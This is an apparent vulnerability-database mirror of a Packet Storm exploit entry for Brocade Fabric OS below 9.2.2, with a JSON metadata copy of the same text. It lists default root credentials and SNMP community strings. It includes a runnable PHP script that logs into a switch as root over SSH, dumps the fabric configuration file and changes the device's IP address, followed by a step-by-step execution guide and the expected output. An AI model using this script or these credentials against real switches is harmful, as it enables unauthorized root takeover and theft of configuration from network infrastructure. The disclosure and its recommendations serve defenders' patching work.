📄 Brocade Fabric OS Weak Crypto / Key Compromise

9.8 / 10

CRITICAL

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Description

This analysis focuses on some older flaws with Brocade Fabric OS versions prior to 9.2.2 related to man-in-the-middle, weak cryptography, and hardcoded key compromise vulnerabilities...

Visit Original Source

Basic Information

ID PACKETSTORM:212104

Published Nov 26, 2025 at 00:00

Affected Product

Affected Versions =============================================================================================================================================
| # Title : Brocade Fabric OS < 9.2.2 – 10 Critical Vulnerabilities Allowing MITM, Weak Crypto and Hardcoded Key Compromise |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://www.broadcom.com/products/fibre-channel-networking/switches |
=============================================================================================================================================

POC :

[+] Summary
------------------------------------------------------------

Brocade Fabric OS versions older than 9.2.2 suffer from multiple
high‑risk vulnerabilities including remote code execution,
information disclosure, man‑in‑the‑middle, weak cryptography,
hardcoded keys, insecure SNMP services, and exploitable default
root credentials. A remote attacker can completely compromise the
device, execute commands as root, modify network configuration,
extract sensitive configuration files, and push malicious firmware.

------------------------------------------------------------
[+] Vulnerabilities
------------------------------------------------------------

[1] Default & Weak Credentials (CVE-2021-27797)
- Username: root
- Password: fibranne
Allows full SSH/Telnet/web root access.

[2] Pre‑Authentication RCE (CVE-2022-33186)
- ezswitchsetup protocol on 52357/udp runs as root.
- No authentication required.
- Attacker can change passwords, alter configs, or take full control.

[3] Insecure SNMP Access
- SNMP communities: “Secret C0de”, “OrigEquipMfr”.
- Full system info disclosure.
- Potential MITM → malicious firmware upload.

[4] Insecure HTTP/Java Access
- Credentials sent in base64.
- Java management clients downloadable without validation.
- Command injection possible.

------------------------------------------------------------
3. PoC – Remote Root Access (PHP)
------------------------------------------------------------

<?php
require 'vendor/autoload.php';
use phpseclib3\Net\SSH2;

if ($argc < 2) {
exit("Usage: php poc.php <target_ip>\n");
}

$target = $argv[1];
$user = 'root';
$pass = 'fibranne';

$ssh = new SSH2($target);
if (!$ssh->login($user, $pass)) {
exit("[-] Login failed.\n");
}

echo "[+] Login success!\n";

// Read sensitive configuration file
$config = $ssh->exec('cat /etc/fabos/fabos.0.conf');
echo "[+] Configuration file content:\n";
echo $config;

// Example of remote command execution (proof only)
$new_ip = '192.168.1.100';
$ssh->exec("ifconfig eth0 $new_ip netmask 255.255.255.0");

echo "[+] IP address changed to $new_ip (PoC demonstration).\n";
?>

------------------------------------------------------------
4. PoC Execution Guide
------------------------------------------------------------

Step 1 – Install phpseclib:
composer require phpseclib/phpseclib

Step 2 – Save the file as:
poc.php

Step 3 – Run the PoC:
php poc.php <TARGET-IP>

Example:
php poc.php 10.13.3.8

Expected Output:
[+] Login success!
[+] Configuration file content:
<system config appears>
[+] IP address changed to 192.168.1.100

------------------------------------------------------------
5. Recommendations
------------------------------------------------------------

- Immediately change all default credentials.
- Restrict management interfaces (SSH/SNMP/HTTP).
- Disable ezswitchsetup protocol.
- Upgrade to Fabric OS 9.2.2 or later.
- Monitor logs for unauthorized access.
- Verify firmware integrity regularly.

------------------------------------------------------------
6. References
------------------------------------------------------------

https://pierrekim.github.io/advisories/2025-brocade-switches.txt
https://pierrekim.github.io/blog/2025-03-31-brocade-switches-10-vulnerabilities.html
https://www.broadcom.com/products/fibre-channel-networking/switches

Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================

{
    "lastseen": "2025-11-26T18:14:46",
    "description": "This analysis focuses on some older flaws with Brocade Fabric OS versions prior to 9.2.2 related to man-in-the-middle, weak cryptography, and hardcoded key compromise vulnerabilities...",
    "published": "2025-11-26T00:00:00",
    "modified": "2025-11-26T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Brocade Fabric OS Weak Crypto / Key Compromise",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:212104",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2021-27797",
        "CVE-2022-33186"
    ],
    "sourceData": "=============================================================================================================================================\n    | # Title     : Brocade Fabric OS < 9.2.2 \u2013 10 Critical Vulnerabilities Allowing MITM, Weak Crypto and Hardcoded Key Compromise             |\n    | # Author    : indoushka                                                                                                                   |\n    | # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits)                                                            |\n    | # Vendor    : https://www.broadcom.com/products/fibre-channel-networking/switches                                                         |\n    =============================================================================================================================================\n    \n    POC :\n    \n    [+] Summary\n        ------------------------------------------------------------\n    \n       Brocade Fabric OS versions older than 9.2.2 suffer from multiple\n       high\u2011risk vulnerabilities including remote code execution,\n       information disclosure, man\u2011in\u2011the\u2011middle, weak cryptography,\n       hardcoded keys, insecure SNMP services, and exploitable default\n       root credentials. A remote attacker can completely compromise the\n       device, execute commands as root, modify network configuration,\n       extract sensitive configuration files, and push malicious firmware.\n    \n       ------------------------------------------------------------\n    [+] Vulnerabilities\n       ------------------------------------------------------------\n    \n    [1] Default & Weak Credentials (CVE-2021-27797)\n       - Username: root\n       - Password: fibranne\n      Allows full SSH/Telnet/web root access.\n    \n    [2] Pre\u2011Authentication RCE (CVE-2022-33186)\n        - ezswitchsetup protocol on 52357/udp runs as root.\n        - No authentication required.\n        - Attacker can change passwords, alter configs, or take full control.\n    \n    [3] Insecure SNMP Access\n       - SNMP communities: \u201cSecret C0de\u201d, \u201cOrigEquipMfr\u201d.\n       - Full system info disclosure.\n       - Potential MITM \u2192 malicious firmware upload.\n    \n    [4] Insecure HTTP/Java Access\n        - Credentials sent in base64.\n        - Java management clients downloadable without validation.\n        - Command injection possible.\n    \n    ------------------------------------------------------------\n    3. PoC \u2013 Remote Root Access (PHP)\n    ------------------------------------------------------------\n    \n    <?php\n    require 'vendor/autoload.php';\n    use phpseclib3\\Net\\SSH2;\n    \n    if ($argc < 2) {\n        exit(\"Usage: php poc.php <target_ip>\\n\");\n    }\n    \n    $target = $argv[1];\n    $user   = 'root';\n    $pass   = 'fibranne';\n    \n    $ssh = new SSH2($target);\n    if (!$ssh->login($user, $pass)) {\n        exit(\"[-] Login failed.\\n\");\n    }\n    \n    echo \"[+] Login success!\\n\";\n    \n    // Read sensitive configuration file\n    $config = $ssh->exec('cat /etc/fabos/fabos.0.conf');\n    echo \"[+] Configuration file content:\\n\";\n    echo $config;\n    \n    // Example of remote command execution (proof only)\n    $new_ip = '192.168.1.100';\n    $ssh->exec(\"ifconfig eth0 $new_ip netmask 255.255.255.0\");\n    \n    echo \"[+] IP address changed to $new_ip (PoC demonstration).\\n\";\n    ?>\n    \n    ------------------------------------------------------------\n    4. PoC Execution Guide\n    ------------------------------------------------------------\n    \n    Step 1 \u2013 Install phpseclib:\n        composer require phpseclib/phpseclib\n    \n    Step 2 \u2013 Save the file as:\n        poc.php\n    \n    Step 3 \u2013 Run the PoC:\n        php poc.php <TARGET-IP>\n    \n    Example:\n        php poc.php 10.13.3.8\n    \n    Expected Output:\n        [+] Login success!\n        [+] Configuration file content:\n            <system config appears>\n        [+] IP address changed to 192.168.1.100\n    \n    ------------------------------------------------------------\n    5. Recommendations\n    ------------------------------------------------------------\n    \n    - Immediately change all default credentials.\n    - Restrict management interfaces (SSH/SNMP/HTTP).\n    - Disable ezswitchsetup protocol.\n    - Upgrade to Fabric OS 9.2.2 or later.\n    - Monitor logs for unauthorized access.\n    - Verify firmware integrity regularly.\n    \n    ------------------------------------------------------------\n    6. References\n    ------------------------------------------------------------\n    \n    https://pierrekim.github.io/advisories/2025-brocade-switches.txt\n    https://pierrekim.github.io/blog/2025-03-31-brocade-switches-10-vulnerabilities.html\n    https://www.broadcom.com/products/fibre-channel-networking/switches\n    \n    \n    Greetings to :=====================================================================================\n    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|\n    ===================================================================================================",
    "sourceHref": "https://packetstorm.news/download/212104",
    "cvss": {
        "score": 9.8,
        "severity": "CRITICAL",
        "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/212104/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

📄 Brocade Fabric OS Weak Crypto / Key Compromise_PACKETSTORM:212104

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply